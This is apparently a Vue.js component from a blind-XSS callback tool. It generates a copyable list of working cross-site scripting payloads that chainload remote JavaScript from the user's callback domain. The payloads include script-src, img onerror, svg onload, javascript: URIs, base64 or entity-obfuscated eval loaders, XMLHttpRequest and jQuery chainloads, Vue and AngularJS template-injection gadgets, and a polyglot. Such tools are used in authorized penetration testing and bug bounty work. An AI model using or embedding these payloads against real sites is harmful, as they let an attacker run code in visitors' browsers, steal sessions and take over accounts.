<template>
    <div>
        <div class="row">
            <div class="col-12">
                <card class="xss-card-container">
                    <div class="row pl-4 pr-4 p-2" style="display: block;">
                        <div>
                            <h1><i class="fas fa-file-code"></i> XSS Payloads</h1>
                            <h3>For a shorter URL, change your path on the settings page</h3>
                        </div>
                        <card v-for="payload in payloads">
                            <h4 class="card-title" v-html="payload.title"></h4>
                            <div v-for="p in payload.func()">
                                <h6 class="card-subtitle mb-2 text-muted">{{p[0]}}</h6>
                                <p class="card-text">
                                    <base-input type="text" v-bind:value="p[1]" placeholder="..."></base-input>
                                </p>
                                <base-button type="primary" v-clipboard:copy="p[1]">
                                    <span style="display: inline-block; margin-right: 6px;"><i class="far fa-copy"></i></span>
                                    Copy Payload
                                </base-button>
                            </div>
                        </card>
                    </div>
                </card>
            </div>
        </div>
    </div>
</template>
<script>
import config from '@/config';
import Vue from "vue";
import api_request from '@/libs/api.js';
import router from "@/router/index";
import utils from '@/libs/utils';
const html_encode = utils.html_encode;
const urlsafe_base64_encode = utils.urlsafe_base64_encode;

export default {
    data() {
        return {
            payloads: [
                {
                    'func': this.basic_script,
                    'title': 'Basic <code>&lt;script&gt;</code> Tag Payloads',
                    'description': 'Classic payloads',
                },
                {
                    'func': this.basic_script2,
                    'title': 'Basic <code>&lt;script&gt;</code> without closing script tag (via svg)',
                    'description': 'without closing script tag (via svg)',
                },
                {
                    'func': this.image_onerror,
                    'title': '<code>&lt;img&gt;</code> Tag Payloads',
                    'description': 'Image-based payloads',
                },
                {
                    'func': this.javascript_context,
                    'title': '<code>JavaScript Context Injection</code> (via import)',
                    'description': 'JavaScript Context Injection (via import)',
                },
                {
                    'func': this.svg_onload,
                    'title': '<code>svg onload</code> Tag Payloads',
                    'description': 'svg onload via import',
                },
                {
                    'func': this.javascript_uri,
                    'title': '<code>javascript:</code> URI Payloads',
                    'description': 'Link-based XSS',
                },
                {
                    'func': this.input_onfocus,
                    'title': '<code>&lt;input&gt;</code> Tag Payloads',
                    'description': 'HTML5 input-based payloads',
                },
                {
                    'func': this.video_source,
                    'title': '<code>&lt;video&gt;&lt;source&gt;</code> Tag Payload',
                    'description': 'Video-based payloads',
                },
                {
                    'func': this.iframe_srcdoc,
                    'title': '<code>&lt;iframe srcdoc=</code> Tag Payload',
                    'description': 'iframe-based payloads',
                },
                {
                    'func': this.xmlhttprequest_load,
                    'title': 'XMLHttpRequest Payloads',
                    'description': 'Inline execution chainload payloads',
                },
                {
                    'func': this.jquery_chainload,
                    'title': '<code>getScript()</code> (jQuery) Payloads',
                    'description': 'Chainload payload for sites with jQuery',
                },
                {
                    'func': this.vuejs_payloadv2,
                    'title': '<code>VueJS v2</code>Payloads',
                    'description': 'VueJS v2 Payloads',
                },
                {
                    'func': this.vuejs_payloadv3,
                    'title': '<code>VueJS v3</code>Payload',
                    'description': 'VueJS v3 Payloads',
                },
                {
                    'func': this.angularjs_payload,
                    'title': '<code>Angular JS</code>Payloads',
                    'description': 'Angular JS Payloads',
                },
                {
                    'func': this.polyglot_payloads,
                    'title': '<code>Polyglot Payloads</code>',
                    'description': 'Polyglot Payloads',
                },
            ],
            base_domain: '',
        }
    },
    watch: {},
    methods: {
        get_domainAndPath() {
            const parts = this.base_domain.split('/');
            return {
                domain: parts[0],
                path: parts[1]
            };
        },
        js_attrib: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return `(d=document,d.body.appendChild(d.createElement("script")).src="//${_domain}/${_path}")`;
        },
        basic_script: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return [
                ["description1",`"><script src=//${_domain}/${_path}><\/script>`],
                ["description2",`"><script/src=//${_domain}/${_path}><\/script>`],
                ["description2", `"><script/src=//${_domain}/${_path}><\/script>`],
            ];
        },
        basic_script2: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return [
                ["description1", `"><svg><script href=//${this.base_domain} \/>`],
                ["description2", `"><svg><script/href=//${this.base_domain} \/>`]
            ];
        },
        javascript_context: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return [
                ["description3", `'-import('//${_domain}/${_path}')-'`],
                ["description4", `'-import('//${_path}.${_domain}')-'`]
            ];
        },
        javascript_uri: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return [
                ["description",`javascript:import('//${_domain}/${_path}')`],
                ["description",`javascript:import('//${_path}.${_domain}')`],
                ["description",`javascript:(d=document,d.body.appendChild(d.createElement(/script/.source)).src=(/,/+/${_domain}/).slice(2)+/${_path}/.source)`]
            ];
        },
        svg_onload: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return [
                ["description",`"><svg onload=import('//${_domain}/${_path}')>`],
                ["description",`"><svg/onload=import('//${_domain}/${_path}')>`],
                ["description",`"><svg onload=import('//${_path}.${_domain}')>`]
            ];
        },
        input_onfocus: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return [
                ["description",`"><input onfocus=eval(atob(this.id)) id=${html_encode(urlsafe_base64_encode(this.js_attrib()))} autofocus>`]
            ];
        },
        image_onerror: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return [
                ["description",`"><img src onerror=import('//${_domain}/${_path}')>`],
                ["description",`"><img/src/onerror=import('//${_domain}/${_path}')>`],
                ["description",`"><img src id=${html_encode(urlsafe_base64_encode(this.js_attrib()))} onerror=eval(atob(this.id))>`],
                ["description",`"><img src id=${html_encode(urlsafe_base64_encode('import("//' + _domain + '/' + _path + '")'))} onerror=eval(atob(this.id))>`],
            ];
        },
        video_source: function() {
            return [
                ["description",`"><video><source onerror=eval(atob(this.id)) id=${html_encode(urlsafe_base64_encode(this.js_attrib()))}>`]
            ];
        },
        iframe_srcdoc: function() {
            return [
                ["description",`"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;${this.base_domain}&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">`]
            ];
        },
        xmlhttprequest_load: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();

            return [
                ["description",`<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener('load',b);a.open('GET','//${_domain}/${_path}');a.send();<\/script>`]
            ];
        },
        jquery_chainload: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return [
                ["description",'<script>$.getScript(\'//' + _domain + '/' + _path + '\')<\/script>']
            ];
        },
        vuejs_payloadv2: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            return [
                ["description",`{{constructor.constructor('import("//${_domain}/${_path}")')()}}`]
            ];
        },
        vuejs_payloadv3: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            const importString = `import("//${_domain}/${_path}")`;
            return [
                ["description",`{{_openBlock.constructor('${importString}')()}}`],
                ["description",`{{_Vue.h.constructor('${importString}')()}}`],
                ["description",`{{$emit.constructor('${importString}')()}}`]
            ];
        },
        angularjs_payload: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();
            const importString = `import("//${_domain}/${_path}")`;
            return [
                ["description",`{{$on.constructor('${importString}')()}}`],
                ["description",`{{constructor.constructor('${importString}')()}}`],
                ["description",`<input ng-focus=$event.view.constructor('${importString}')()>`]
            ];
        },
        polyglot_payloads: function() {
            const { domain: _domain, path: _path } = this.get_domainAndPath();

            const payload1 = 'wip';
            return [
                ["description",`'/*\\'/*"/*\\"/*<\/Script><ImG\/SrC\/OnErroR=/**/(import(/https:\\\\${_path}.${_domain}/.source))//>`]
            ];
        },
    },
    computed: {},
    components: {},
    async mounted() {
        // For debugging
        window.app = this;
        const res = await api_request.get_xss_uri();
        if (res["success"] == false){
            window.location = "/login";
        }
        // Base domain
        this.base_domain = res["result"]["uri"];
    },
    beforeDestroy() {}
};
</script>
<style>
.control-label {
    color: #d3d3d7 !important;
    display: inline;
}
</style>
